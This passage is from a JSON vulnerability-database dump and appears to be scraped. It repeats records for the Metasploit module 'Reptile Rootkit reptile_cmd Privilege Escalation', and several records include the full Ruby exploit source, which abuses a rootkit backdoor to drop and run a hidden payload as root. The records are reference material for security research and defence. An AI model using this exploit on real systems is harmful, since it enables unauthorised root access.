OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-13T10:42:03", "differentElements": ["sourceData"], "edition": 130}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-15T18:15:38", "history": [], "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0A9FF260770515B1AE0D8A9CDFEFDEA1"]}, {"type": "thn", "idList": ["THN:50C2029CD06D2D7F06B4142DBC1A4E56", "THN:956E33D4B29C7F96F73E292451CB1A46"]}, {"type": "exploitdb", "idList": ["EDB-ID:48473", "EDB-ID:48472"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892176", "OPENVAS:1361412562310704685", "OPENVAS:1361412562310892210"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2020-2171.NASL"]}, {"type": "redhat", "idList": ["RHSA-2020:2171", "RHSA-2020:2169"]}, {"type": "kitploit", "idList": ["KITPLOIT:8373701518620808878"]}, {"type": "threatpost", "idList": ["THREATPOST:7C714B04D173D29CA1EDD33A0D9FD7D6", "THREATPOST:754BCE09C77E05D5FF580DBFEB8A0938"]}, {"type": "securelist", "idList": ["SECURELIST:9B20628F21A6D65A468B95654F7C98AD"]}, {"type": "amazon", "idList": ["ALAS-2020-1365", "ALAS-2020-1364", "ALAS-2020-1363", "ALAS-2020-1366"]}], "modified": "2020-05-15T18:15:38", "rev": 2}, "score": {"value": 3.5, "vector": "NONE", "modified": "2020-05-15T18:15:38", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-15T18:15:38", "differentElements": ["sourceData"], "edition": 131}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-15T22:10:44", "history": [], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:952D04096518D0B7F327105312D5BB8C", "THREATPOST:AE195D6FFC6C0786606D93CB0E022A4F"]}, {"type": "github", "idList": ["GHSA-R854-96GQ-RFG3"]}, {"type": "cert", "idList": ["VU:534195"]}, {"type": "nessus", "idList": ["FEDORA_2020-831EC85119.NASL", "FEDORA_2020-848065CC4C.NASL", "FEDORA_2020-A60AD9D4EC.NASL", "FEDORA_2020-A6A921A591.NASL", "DEBIAN_DLA-2214.NASL", "FEDORA_2020-AE934F6790.NASL", "FEDORA_2020-6E3E0C6386.NASL", "FREEBSD_PKG_CE6DB19B976E11EA93C408002728F74C.NASL", "FREEBSD_PKG_6BF55AF9973B11EA9F2C38D547003487.NASL"]}, {"type": "ubuntu", "idList": ["USN-4363-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2081", "ELSA-2020-5691"]}, {"type": "exploitdb", "idList": ["EDB-ID:48475"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157748", "PACKETSTORM:157744"]}], "modified": "2020-05-15T22:10:44", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2020-05-15T22:10:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-15T22:10:44", "differentElements": ["sourceData"], "edition": 132}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-19T06:43:10", "history": [], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:2214"]}, {"type": "threatpost", "idList": ["THREATPOST:952D04096518D0B7F327105312D5BB8C", "THREATPOST:AE195D6FFC6C0786606D93CB0E022A4F"]}, {"type": "exploitdb", "idList": ["EDB-ID:48475", "EDB-ID:48491"]}, {"type": "cve", "idList": ["CVE-2020-13135", "CVE-2020-13143", "CVE-2020-13149", "CVE-2020-11549"]}, {"type": "github", "idList": ["GHSA-R854-96GQ-RFG3"]}, {"type": "nessus", "idList": ["FEDORA_2020-AE934F6790.NASL", "DEBIAN_DLA-2214.NASL", "FEDORA_2020-A60AD9D4EC.NASL"]}, {"type": "ubuntu", "idList": ["USN-4363-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5691", "ELSA-2020-2081"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157748", "PACKETSTORM:157744"]}, {"type": "cert", "idList": ["VU:534195"]}], "modified": "2020-05-19T06:43:10", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2020-05-19T06:43:10", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-19T06:43:10", "differentElements": ["sourceData"], "edition": 133}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-19T14:36:00", "history": [], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-22386"]}, {"type": "kitploit", "idList": ["KITPLOIT:7753147786791089346", "KITPLOIT:7573195749564152496", "KITPLOIT:6229678575344641487"]}, {"type": "redhat", "idList": ["RHSA-2020:2214", "RHSA-2020:2199", "RHSA-2020:2231", "RHSA-2020:2242"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:72D731DD80A518381458D428B63F4EA7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:16A11ECEC24ACDD1B269C0C383FA74C9"]}, {"type": "securelist", "idList": ["SECURELIST:B7A29D52B8BBCD97C439EA9A6B2F60DB", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143937"]}, {"type": "ubuntu", "idList": ["LSN-0067-1", "USN-4363-1"]}, {"type": "mssecure", "idList": ["MSSECURE:D5424F89025670892EF72D48DFF76820"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:16910F8F7350EDEC5F676260B0259058"]}, {"type": "threatpost", "idList": ["THREATPOST:AE195D6FFC6C0786606D93CB0E022A4F"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2081"]}], "modified": "2020-05-19T14:36:00", "rev": 2}, "score": {"value": 1.5, "vector": "NONE", "modified": "2020-05-19T14:36:00", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-19T14:36:00", "differentElements": ["modified", "published"], "edition": 134}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-21T08:16:29", "history": [], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "mskb", "idList": ["KB4475519", "KB3057110", "KB2647516", "KB2618444", "KB2559049", "KB3106614", "KB3126036", "KB3182373", "KB2586448", "KB4461487"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-22386"]}, {"type": "ubuntu", "idList": ["USN-4369-1", "USN-4363-1"]}], "modified": "2020-05-21T08:16:29", "rev": 2}, "score": {"value": 0.9, "vector": "NONE", "modified": "2020-05-21T08:16:29", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-21T08:16:29", "differentElements": ["modified", "published"], "edition": 135}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-21T09:57:26", "history": [], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:2289", "RHSA-2020:2285", "RHSA-2020:2277"]}, {"type": "thn", "idList": ["THN:5259C2425B367BE03F52701840CF3838", "THN:754EDA3BD8060BD079B3DB44EE616405"]}, {"type": "kitploit", "idList": ["KITPLOIT:8965433741129978892", "KITPLOIT:3078018700952514075", "KITPLOIT:2366294729156247605"]}, {"type": "exploitdb", "idList": ["EDB-ID:48514", "EDB-ID:48509", "EDB-ID:48511", "EDB-ID:48513"]}, {"type": "pentestit", "idList": ["PENTESTIT:A47061C9D805CCE0A976CBB374FBE8C8"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4692-1:CFC43"]}, {"type": "ubuntu", "idList": ["USN-4369-1", "USN-4367-1"]}, {"type": "cve", "idList": ["CVE-2020-13424"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0698-1"]}, {"type": "krebs", "idList": ["KREBS:61BAD67A2C383C0A4AFEBA67A534E310"]}], "modified": "2020-05-21T09:57:26", "rev": 2}, "score": {"value": 4.4, "vector": "NONE", "modified": "2020-05-21T09:57:26", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-21T09:57:26", "differentElements": ["modified", "published"], "edition": 136}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` 